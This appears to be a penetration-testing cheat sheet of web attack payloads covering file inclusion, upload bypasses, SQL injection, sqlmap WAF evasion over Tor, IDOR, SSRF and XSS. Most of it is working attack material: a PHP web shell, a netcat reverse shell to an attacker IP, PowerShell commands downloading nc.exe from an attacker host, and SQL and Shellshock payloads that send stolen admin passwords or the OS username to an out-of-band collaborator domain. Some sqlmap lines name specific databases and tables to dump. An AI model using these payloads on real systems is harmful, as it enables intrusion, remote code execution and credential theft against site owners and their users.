https://abc.redact.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd
https://abc.redact.com/static/../../../../../../../../../../../../../../../etc/passwd
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00
https://abc.redact.com/static//..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.html
https://abc.redact.com/asd.php?file:///etc/passwd
https://abc.redact.com/asd.php?file:///etc/passwd%00
https://abc.redact.com/asd.php?file:///etc/passwd%00.html
https://abc.redact.com/asd.php?file:///etc/passwd%00.ext
https://abc.redact.com/asd.php?file:///..//..//..//..//..//..//..//..//..//..//..//..//..//..//../etc/passwd%00.ext/etc/passwd
# LFI Windows
http://10.11.1.111/addguestbook.php?LANG=../../windows/system32/drivers/etc/hosts%00
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini
http://10.11.1.111/addguestbook.php?LANG=../../../../../../../../../../../../../../../boot.ini
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00
http://10.11.1.111/addguestbook.php?LANG=/..//..//..//..//..//..//..//..//..//..//..//..//..//..//../boot.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.html
http://10.11.1.111/addguestbook.php?LANG=file:///C:/boot.ini
http://10.11.1.111/addguestbook.php?LANG=file:///C:/win.ini
http://10.11.1.111/addguestbook.php?LANG=C:\\boot.ini%00.ext
http://10.11.1.111/addguestbook.php?LANG=%SYSTEMROOT%\\win.ini%00.ext

- LFI using video upload:
https://github.com/FFmpeg/FFmpeg
https://hackerone.com/reports/226756
https://hackerone.com/reports/237381
https://docs.google.com/presentation/d/1yqWy_aE3dQNXAhW8kxMxRqtP7qMHaIfMzUDpEqFneos/edit
https://github.com/neex/ffmpeg-avi-m3u-xbin

# Contaminating log files
root@kali:~# nc -v 10.11.1.111 80
10.11.1.111: inverse host lookup failed: Unknown host
(UNKNOWN) [10.11.1.111] 80 (http) open
 <?php echo shell_exec($_GET['cmd']);?> 
http://10.11.1.111/addguestbook.php?LANG=../../xampp/apache/logs/access.log%00&cmd=ipconfig

# RFI:
http://10.11.1.111/addguestbook.php?LANG=http://10.11.1.111:31/evil.txt%00
Content of evil.txt:
<?php echo shell_exec("nc.exe 10.11.0.105 4444 -e cmd.exe") ?>
# RFI over SMB (Windows)
cat php_cmd.php
    <?php echo shell_exec($_GET['cmd']);?>
- Start SMB Server in attacker machine and put evil script
- Access it via browser (2 request attack):
    - http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c Invoke-WebRequest -Uri "http://10.10.14.42/nc.exe" -OutFile "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe"
    - http://10.11.1.111/blog/?lang=\\ATTACKER_IP\ica\php_cmd.php&cmd=powershell -c "C:\\windows\\system32\\spool\\drivers\\color\\nc.exe" -e cmd.exe ATTACKER_IP 1234

- Cross Content Hijacking:
https://github.com/nccgroup/CrossSiteContentHijacking
https://soroush.secproject.com/blog/2014/05/even-uploading-a-jpg-file-can-lead-to-cross-domain-data-hijacking-client-side-attack/
http://50.56.33.56/blog/?p=242

- Encoding scripts in PNG IDAT chunk:
https://yqh.at/scripts_in_pngs.php

File Upload Bypass

- File name validation
    - extension blacklisted:
    pht,phpt,phtml,php3,php4,php5,php6
    - extension whitelisted:
    php%00.gif, shell.jpg.php
- Content type bypass
    - Preserve name, but change content-type
    Content-Type: image/jpeg, image/gif, image/png
- Content length:
    - Small bad code:
    <?='$_GET[x]'?>
    
# Filter Bypassing Techniques
- upload asp file using .cer & .asa extension (IIS — Windows)
- Upload .eml file when content-type = text/HTML
- Inject null byte shell.php%001.jpg
- Check for .svg file upload you can achieve stored XSS using XML payload
- put file name ../../logo.png or ../../etc/passwd/logo.png to get directory traversal via upload file
- Upload large size file for DoS attack test using the image.
- (magic number) upload shell.php change content-type to image/gif and start content with GIF89a; will do the job!
- If web app allows for zip upload then rename the file to pwd.jpg bcoz developer handle it via command
- upload the file using SQL command 'sleep(10).jpg you may achieve SQL if image directly saves to DB.

# Advance Bypassing techniques
- Imagetragick aka ImageMagick:
https://mukarramkhalid.com/imagemagick-imagetragick-exploit/
https://github.com/neex/gifoeb
    
# Upload file tool
https://github.com/almandin/fuxploider
python3 fuxploider.py --url https://example.com --not-regex "wrong file type"

SQLi

https://portswigger.net/web-security/sql-injection/cheat-sheet

SQLI Polyglots:
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/

• MySQL:
• http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
• https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/

• MSQQL:
• http://evilsql.com/main/page2.php
• http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet

• ORACLE:
• http://pentestmonkey.net/cheat-sheet/sql-injection/oracle-sql-injection-cheat-sheet

• POSTGRESQL:
• http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet

• Others
• http://nibblesec.org/files/MSAccessSQLi/MSAccessSQLi.html
• http://pentestmonkey.net/cheat-sheet/sql-injection/ingres-sql-injection-cheat-sheet
• http://pentestmonkey.net/cheat-sheet/sql-injection/db2-sql-injection-cheat-sheet
• http://pentestmonkey.net/cheat-sheet/sql-injection/informix-sql-injection-cheat-sheet
• https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet
• http://rails-sqli.org/

SQLi Basics

URL

Base:
https://insecure-website.com/products?category=Gifts
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'   <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

SQLi:
https://insecure-website.com/products?category=Gifts'--
https://insecure-website.com/products?category=Gifts'+OR+1=1--

LOGIN

User:
administrator'--
Password:
asdasdsa   

OTHER TABLES
' UNION SELECT username, password FROM users--        

GET VERSION INFO:

Microsoft,Mysql         SELECT @@version
Oracle                  SELECT * FROM v$version / SELECT banner FROM v$version / SELECT version FROM v$instance
PostgreSQL              SELECT version()

Blind SQLi

# Conditional Responses

Request with:
Cookie: TrackingId=u5YD3PapBcR4lN3e7Tj4

    In the DDBB it does:
    SELECT TrackingId FROM TrackedUsers WHERE TrackingId = 'u5YD3PapBcR4lN3e7Tj4' - If exists, show content or “Welcome back”

To detect:
TrackingId=x'+OR+1=1-- OK
TrackingId=x'+OR+1=2-- KO
# User admin exist
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'-- OK
# Password length
TrackingId=x'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+length(password)>1--

So, in the cookie header if first letter of password is greater than ‘m’, or ‘t’ or equal to ‘s’ response will be ok.

xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 'm'--
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) > 't'--
xyz' UNION SELECT 'a' FROM Users WHERE Username = 'Administrator' and SUBSTRING(Password, 1, 1) = 's'--
z'+UNION+SELECT+'a'+FROM+users+WHERE+username='administrator'+AND+substring(password,6,1)='§a§'--

# Force conditional responses

TrackingId=x'+UNION+SELECT+CASE+WHEN+(1=1)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+dual-- RETURNS ERROR IF OK
TrackingId=x'+UNION+SELECT+CASE+WHEN+(1=2)+THEN+to_char(1/0)+ELSE+NULL+END+FROM+dual-- RETURNS NORMALLY IF KO
TrackingId='+UNION+SELECT+CASE+WHEN+(username='administrator'+AND+substr(password,3,1)='§a§')+THEN+to_char(1/0)+ELSE+NULL+END+FROM+users--;

# Time delays
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
TrackingId=x'; IF (SELECT COUNT(username) FROM Users WHERE username = 'Administrator' AND SUBSTRING(password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'--
TrackingId=x'; IF (1=2) WAITFOR DELAY '0:0:10'--
TrackingId=x'||pg_sleep(10)--
TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+substring(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--

# Out-of-Band OAST (Collaborator)
Asynchronous response

Confirm:
TrackingId=x'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//x.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

Exfil:
TrackingId=x'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master..xp_dirtree "//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')--
TrackingId=x'+UNION+SELECT+extractvalue(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/">+%25remote%3b]>'),'/l')+FROM+dual--

UNIONs

' UNION SELECT username, password FROM users--    

Must match number of columns and its types (NULL):

Detect number of columns required:

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--

or

' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

    In Oracle: ' UNION SELECT NULL FROM DUAL--

Detect valid data column's datatype:

-Must match correct columns number

' UNION SELECT 'a',NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,'a'--       

Get values in 1 column:

' UNION SELECT username || '~' || password FROM users--

Second Order SQLi

A second-order SQL Injection, on the other hand, is a vulnerability exploitable in two different steps:
1. Firstly, we STORE a particular user-supplied input value in the DB and
2. Secondly, we use the stored value to exploit a vulnerability in a vulnerable function in the source code which constructs the dynamic query of the web application.

Example payload:
X' UNION SELECT user(),version(),database(), 4 --
X' UNION SELECT 1,2,3,4 --

- For example, in a password reset query with user "User123' --":

$pwdreset = mysql_query(“UPDATE users SET password=’getrekt’ WHERE username=’User123' — ‘ and password=’UserPass@123'”);

Will be:

$pwdreset = mysql_query(“UPDATE users SET password=’getrekt’ WHERE username=’User123'”);

So you don't need to know the password.

- User = ‘ or ’asd'='asd it will return always true
- User = admin'-- probably not check the password

sqlmap

# Post
./sqlmap.py -r search-test.txt -p tfUPass

# Get
sqlmap -u "http://10.11.1.111/index.php?id=1" --dbms=mysql

# Crawl
sqlmap -u http://10.11.1.111 --dbms=mysql --crawl=3

# Full auto - FORMS
sqlmap -u 'http://10.11.1.111:1337/978345210/index.php' --forms --dbs --risk=3 --level=5 --threads=4 --batch
# Columns 
sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --columns -T users -D admin
# Values
sqlmap -u 'http://admin.cronos.htb/index.php' --forms --dbms=MySQL --risk=3 --level=5 --threads=4 --batch --dump -T users -D admin

sqlmap -o -u "http://10.11.1.111:1337/978345210/index.php" --data="username=admin&password=pass&submit=+Login+" --method=POST --level=3 --threads=10 --dbms=MySQL --users --passwords

SQLMAP WAF bypass

--level=5 --risk=3 --random-agent --user-agent -v3 --batch --threads=10 --dbs
--dbms="MySQL" -v3 --technique U --tamper="space2mysqlblank.py" --dbs
--dbms="MySQL" -v3 --technique U --tamper="space2comment" --dbs
-v3 --technique=T --no-cast --fresh-queries --banner
sqlmap -u http://www.example.com/index?id=1 --level 2 --risk 3 --batch --dbs


-f -b --current-user --current-db --is-dba --users --dbs

--risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

--risk 3 --level 5 --random-agent --proxy http://123.57.48.140:8080 --dbs

--random-agent --dbms=MYSQL --dbs --technique=B"

--identify-waf --random-agent -v 3 --dbs

1 : --identify-waf --random-agent -v 3 --tamper="between,randomcase,space2comment" --dbs
2 : --parse-errors -v 3 --current-user --is-dba --banner -D eeaco_gm -T #__tabulizer_user_preferences --column --random-agent --level=5 --risk=3

--threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D joomlab -T anz91_session -C session_id --dump

--tables -D miss_db --is-dba --threads="10" --time-sec=10 --timeout=5 --no-cast --tamper=between,modsecurityversioned,modsecurityzeroversioned,charencode,greatest --identify-waf --random-agent

sqlmap.py -u http://192.168.0.107/test.php?id=1 -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"

--banner --safe-url=2 --safe-freq=3 --tamper=between,randomcase,charencode -v 3 --force-ssl --dbs --threads=10 --level=2 --risk=2
-v3 --dbms="MySQL" --risk=3 --level=3 --technique=BU --tamper="space2mysqlblank.py" --random-agent -D damksa_abr -T admin,jobadmin,member --colu

sqlmap --wizard

sqlmap --level=5 --risk=3 --random-agent --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

sqlmap -url www.site.ps/index.php --level 5 --risk 3 tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor --dbms=mssql

sqlmap -url www.site.ps/index.php --level 5 --risk 3 tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes --dbms=mssql

--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent

--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" --tables

--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" --columns

--tamper "randomcase.py" --tor --tor-type=SOCKS5 --tor-port=9050 --dbs --dbms "MySQL" --current-db --random-agent -D "pache_PACHECOCARE" -T "edt_usuarios" -C "ud,email,usuario,contra" --dump

tamper=between.py,charencode.py,charunicodeencode.py,equaltolike.py,greatest.py,multiplespaces.py,nonrecursivereplacement.py,percentage.py,randomcase.py,securesphere.py,sp_password.py,space2comment.py,space2dash.py,space2mssqlblank.py,space2mysqldash.py,space2plus.py,space2randomblank.py,unionalltounion.py,unmagicquotes.py --dbms=mssql

APIs

REST uses: HTTP, JSON , URL and XML
SOAP uses: mostly HTTP and XML

# Tools
https://github.com/Fuzzapi/fuzzapi
https://github.com/Fuzzapi/API-fuzzer

Checklist:
•  Basic auth, OAuth or JWT
•  Login meets the standards
•  Encryption in sensible fields
•  Test from most vulnerable to less
   ◇ Organization's user management
   ◇ Export to CSV/HTML/PDF
   ◇ Custom views of dashboards
   ◇ Sub user creation&management
   ◇ Object sharing (photos, posts,etc)
• Archive.org
• Censys
• VirusTotal

JWT (JSON Web Token)
•  Use a random complicated key (JWT Secret) to make brute forcing the token very hard.
•  Don't extract the algorithm from the header. Force the algorithm in the backend (HS256 or RS256).
•  Make token expiration (TTL, RTTL) as short as possible.
•  Don't store sensitive data in the JWT payload, it can be decoded easily.

OAuth
•  Always validate redirect_uri server-side to allow only whitelisted URLs.
•  Always try to exchange for code and not tokens (don't allow response_type=token).
•  Use state parameter with a random hash to prevent CSRF on the OAuth authentication process.
•  Define the default scope, and validate scope parameters for each application.

Access
•  Limit requests (Throttling) to avoid DDoS / brute-force attacks.
•  Use HTTPS on server side to avoid MITM (Man in the Middle Attack).
•  Use HSTS header with SSL to avoid SSL Strip attack.
•  Check distinct login paths /api/mobile/login | /api/v3/login | /api/magic_link
•  Even id is not numeric, try it /?user_id=111 instead /?user_id=user@mail.com
•  Bruteforce login
•  Try mobile API versions

Input
•  Use the proper HTTP method according to the operation: GET (read), POST (create), PUT/PATCH (replace/update), and DELETE (to delete a record), and respond with 405 Method Not Allowed if the requested method isn't appropriate for the requested resource.
•  Validate content-type on request Accept header (Content Negotiation) to allow only your supported format (e.g. application/xml, application/json, etc.) and respond with 406 Not Acceptable response if not matched.
•  Validate content-type of posted data as you accept (e.g. application/x-www-form-urlencoded, multipart/form-data, application/json, etc.).
•  Validate user input to avoid common vulnerabilities (e.g. XSS, SQL-Injection, Remote Code Execution, etc.).
•  Don't use any sensitive data (credentials, Passwords, security tokens, or API keys) in the URL, but use standard Authorization header.
•  Use an API Gateway service to enable caching, Rate Limit policies (e.g. Quota, Spike Arrest, or Concurrent Rate Limit) and deploy APIs resources dynamically.
• Try input injections in ALL params
• Try execute operating system command 
   ◇ Linux :api.url.com/endpoint?name=file.txt;ls%20/
• XXE
   ◇ <!DOCTYPE test [ <!ENTITY xxe SYSTEM “file:///etc/passwd”> ]>
• SSRF
• Check distinct versions api/v{1..3}
• If REST API try to use as SOAP changing the content-type to "application/xml" and sent any simple xml to body
• IDOR in body/header is more vulnerable than ID in URL
• IDOR:
   ◇ Understand real private resources that only belongs specific user
   ◇ Understand relationships receipts-trips
   ◇ Understand roles and groups
   ◇ If REST API, change GET to other method Add a “Content-length” HTTP header or Change the “Content-type”
   ◇ If get 403/401 in api/v1/trips/666 try 50 random IDs from 0001 to 9999
• Bypass IDOR limits:
   ◇ Wrap ID with an array {“id”:111} --> {“id”:[111]}
   ◇ JSON wrap {“id”:111} --> {“id”:{“id”:111}}
   ◇ Send ID twice URL?id=<LEGIT>&id=<VICTIM>
   ◇ Send wildcard {"user_id":"*"}
   ◇ Param pollution 
      ▪ /api/get_profile?user_id=<victim’s_id>&user_id=<user_id>
      ▪ /api/get_profile?user_id=<legit_id>&user_id=<victim’s_id>
      ▪ JSON POST: api/get_profile {“user_id”:<legit_id>,”user_id”:<victim’s_id>}
      ▪ JSON POST: api/get_profile {“user_id”:<victim’s_id>,”user_id”:<legit_id>}
      ▪ Try wildcard instead ID
• If .NET app and found path, Developers sometimes use "Path.Combine(path_1,path_2)" to create full path. Path.Combine has weird behavior: if param#2 is absolute path, then param#1 is ignored.
   ◇ https://example.org/download?filename=a.png -> https://example.org/download?filename=C:\\inetpub\wwwroot\a.png
   ◇ Test: https://example.org/download?filename=\\smb.dns.praetorianlabs.com\a.png
• Found a limit / page param? (e.g: /api/news?limit=100) It might be vulnerable to Layer 7 DoS. Try to send a long value (e.g: limit=999999999) and see what happens :)

Processing
•  Check if all the endpoints are protected behind authentication to avoid broken authentication process.
•  User own resource ID should be avoided. Use /me/orders instead of /user/654321/orders.
•  Don't auto-increment IDs. Use UUID instead.
•  If you are parsing XML files, make sure entity parsing is not enabled to avoid XXE (XML external entity attack).
•  If you are parsing XML files, make sure entity expansion is not enabled to avoid Billion Laughs/XML bomb via exponential entity expansion attack.
•  Use a CDN for file uploads.
•  If you are dealing with huge amount of data, use Workers and Queues to process as much as possible in background and return response fast to avoid HTTP Blocking.
•  Do not forget to turn the DEBUG mode OFF.
• If found GET /api/v1/users/<id> try DELETE / POST to create/delete users
• Test less known endpoint POST /api/profile/upload_christmas_voice_greeting

Output
•  Send X-Content-Type-Options: nosniff header.
•  Send X-Frame-Options: deny header.
•  Send Content-Security-Policy: default-src 'none' header.
•  Remove fingerprinting headers - X-Powered-By, Server, X-AspNet-Version, etc.
•  Force content-type for your response. If you return application/json, then your content-type response is application/json.
•  Don't return sensitive data like credentials, Passwords, or security tokens.
•  Return the proper status code according to the operation completed. (e.g. 200 OK, 400 Bad Request, 401 Unauthorized, 405 Method Not Allowed, etc.).
• If you find sensitive resource like /receipt try /download_receipt,/export_receipt.
• Export pdf - try XSS or HTML injection
   ◇ LFI: username=<iframe src="file:///C:/windows/system32/drivers/etc/hosts" height=1000 width=1000/>
   ◇ SSRF: <object data=”http://127.0.0.1:8443”/>
   ◇ Open Port: <img src=”http://127.0.0.1:445”/> if delay is < 2.3 secs is open
   ◇ Get real IP: <img src=”https://iplogger.com/113A.gif”/>
   ◇ DoS: <img src=”http://download.thinkbroadband.com/1GB.zip”/>
      ▪ <iframe src=”http://example.com/RedirectionLoop.aspx”/>

CI & CD
•  Audit your design and implementation with unit/integration tests coverage.
•  Use a code review process and disregard self-approval.
•  Ensure that all components of your services are statically scanned by AV software before pushing to production, including vendor libraries and other dependencies.
•  Design a rollback solution for deployments.

SSRF

SSRF:

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.
In typical SSRF examples, the attacker might cause the server to make a connection back to itself, or to other web-based services within the organization's infrastructure, or to external third-party systems.

- SSRF attack against the server:

    • Browse to /admin and observe that you can't directly access the admin page.
    • Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.
    • Change the URL in the stockApi parameter to http://localhost/admin. This should display the administration interface.
    • Read the HTML to identify the URL to delete the target user, which is: http://localhost/admin/delete?username=carlos
    • Submit this URL in the stockApi parameter, to deliver the SSRF attack.

- SSRF against others

    • Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Intruder.
    • Click "Clear §", change the stockApi parameter to http://192.168.0.1:8080/admin then highlight the final octet of the IP address (the number 1), click "Add §".
    • Switch to the Payloads tab, change the payload type to Numbers, and enter 1, 255, and 1 in the "From" and "To" and "Step" boxes respectively.
    • Click "Start attack".
    • Click on the "Status" column to sort it by status code ascending. You should see a single entry with a status of 200, showing an admin interface.
    • Click on this request, send it to Burp Repeater, and change the path in the stockApi to: /admin/delete?username=carlos

- SSRF with blacklist

    • Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.
    • Change the URL in the stockApi parameter to http://127.0.0.1/ and observe that the request is blocked.
    • Bypass the block by changing the URL to: http://127.1/
    • Change the URL to http://127.1/admin and observe that the URL is blocked again.
    • Obfuscate the "a" by double-URL encoding it to %2561 to access the admin interface and delete the target user.


- SSRF with whitelist

    • Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.
    • Change the URL in the stockApi parameter to http://127.0.0.1/ and observe that the application is parsing the URL, extracting the hostname, and validating it against a whitelist.
    • Change the URL to http://username@stock.weliketoshop.net/ and observe that this is accepted, indicating that the URL parser supports embedded credentials.
    • Append a # to the username and observe that the URL is now rejected.
    • Double-URL encode the # to %2523 and observe the extremely suspicious "Internal Server Error" response, indicating that the server may have attempted to connect to "username".
    • Change the URL to http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos to access the admin interface and delete the target user.

- SSRF Open redirection:

    • Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.
    • Try tampering with the stockApi parameter and observe that it isn't possible to make the server issue the request directly to a different host.
    • Click "next product" and observe that the path parameter is placed into the Location header of a redirection response, resulting in an open redirection.
    • Create a URL that exploits the open redirection vulnerability, and redirects to the admin interface, and feed this into the stockApi parameter on the stock checker: /product/nextProduct?path=http://192.168.0.12:8080/admin
    • The stock checker should follow the redirection and show you the admin page. You can then amend the path to delete the target user: /product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

- SSRF out-of-band:

    • In Burp Suite Professional, go to the Burp menu and launch the Burp Collaborator client.
    • Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
    • Visit a product, intercept the request in Burp Suite, and send it to Burp Repeater.
    • Change the Referer header to use the generated Burp Collaborator domain in place of the original domain. Send the request.
    • Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.
    • You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.

- Blind SSRF with Shellshock:

    • In Burp Suite Professional, install the "Collaborator Everywhere" extension from the BApp Store.
    • Add the domain of the lab to Burp Suite's target scope, so that Collaborator Everywhere will target it.
    • Browse the site.
    • Observe that when you load a product page, it triggers an HTTP interaction with Burp Collaborator, via the Referer header.
    • Observe that the HTTP interaction contains your User-Agent string within the HTTP request.
    • Send the request to the product page to Burp Intruder.
    • Use Burp Collaborator client to generate a unique Burp Collaborator payload, and place this into the following Shellshock payload: () { :; }; /usr/bin/nslookup $(whoami).YOUR-SUBDOMAIN-HERE.burpcollaborator.net
    • Replace the User-Agent string in the Burp Intruder request with the Shellshock payload containing your Collaborator domain.
    • Click "Clear §", change the Referer header to http://192.168.0.1:8080 then highlight the final octet of the IP address (the number 1), click "Add §".
    • Switch to the Payloads tab, change the payload type to Numbers, and enter 1, 255, and 1 in the "From" and "To" and "Step" boxes respectively.
    • Click "Start attack".
    • When the attack completes, go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously.
    • You should see a DNS interaction that was initiated by the back-end system that was hit by the successful blind SSRF attack. The name of the OS user should appear within the DNS subdomain.
    • To complete the lab, enter the name of the OS user.


Web requesting other ip or ports like 127.0.0.1:8080 or 192.168.0.1

chat:3000/ssrf?user=&comment=&link=http://127.0.0.1:3000

GET /ssrf?user=&comment=&link=http://127.0.0.1:3000 HTTP/1.1

Enum IP or ports

**Tools**
https://github.com/tarunkant/Gopherus

XSS

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
https://portswigger.net/web-security/cross-site-scripting/preventing

Usage:
• Impersonate or masquerade as the victim user.
• Carry out any action that the user is able to perform.
• Read any data that the user is able to access.
• Capture the user's login credentials.
• Perform virtual defacement of the web site.
• Inject trojan functionality into the web site.

<script>alert(1)</script>

# XSS vectors
https://gist.github.com/kurobeats/9a613c9ab68914312cbb415134795b45

# XSpear
gem install XSpear
XSpear -u 'https://web.com' -a
XSpear -u 'https://www.web.com/?q=123' --cookie='role=admin' -v 1 -a 
XSpear -u "http://testphp.vulnweb.com/search.php?test=query" -p test -v 1

# Dalfox
https://github.com/hahwul/dalfox

- XSS filter bypasss polyglot:
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 

- XSS in filename:
"><img src=x onerror=alert(document.domain)>.gif

- XSS in metadata:
exiftool -FIELD=XSS FILE
exiftool -Artist=’ “><img src=1 onerror=alert(document.domain)>’ brute.jpeg

- XSS in Content:
SVG:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>

- XSS in GIF Magic Number:
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
If image can't load:
url.com/test.php?p=<script src=http://url.com/upload/img/xss.gif>

- XSS in png:
https://www.secjuice.com/hiding-javascript-in-png-csp-bypass/

- XSS in PDF:
https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html?m=1

" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText.fontsize(1)) }; x.open("GET","file:///home/reader/.ssh/id_rsa"); x.send(); </script>
" <script> x=new XMLHttpRequest; x.onload=function(){ document.write(this.responseText) }; x.open("GET","file:///etc/passwd"); x.send(); </script>

https://brutelogic.com.br/blog/file-upload-xss/

# XSS Polyglots
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> 

```

" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

